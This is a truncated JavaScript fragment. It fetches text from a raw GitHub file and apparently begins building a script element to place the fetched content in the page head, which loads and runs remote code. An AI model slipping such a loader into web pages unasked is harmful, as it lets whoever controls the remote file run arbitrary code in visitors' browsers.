var url = 'https://raw.githubusercontent.com/truba77/trubnik/main/from.txt'; fetch(url) .then(response => response.text()) .then(data => { // head var script…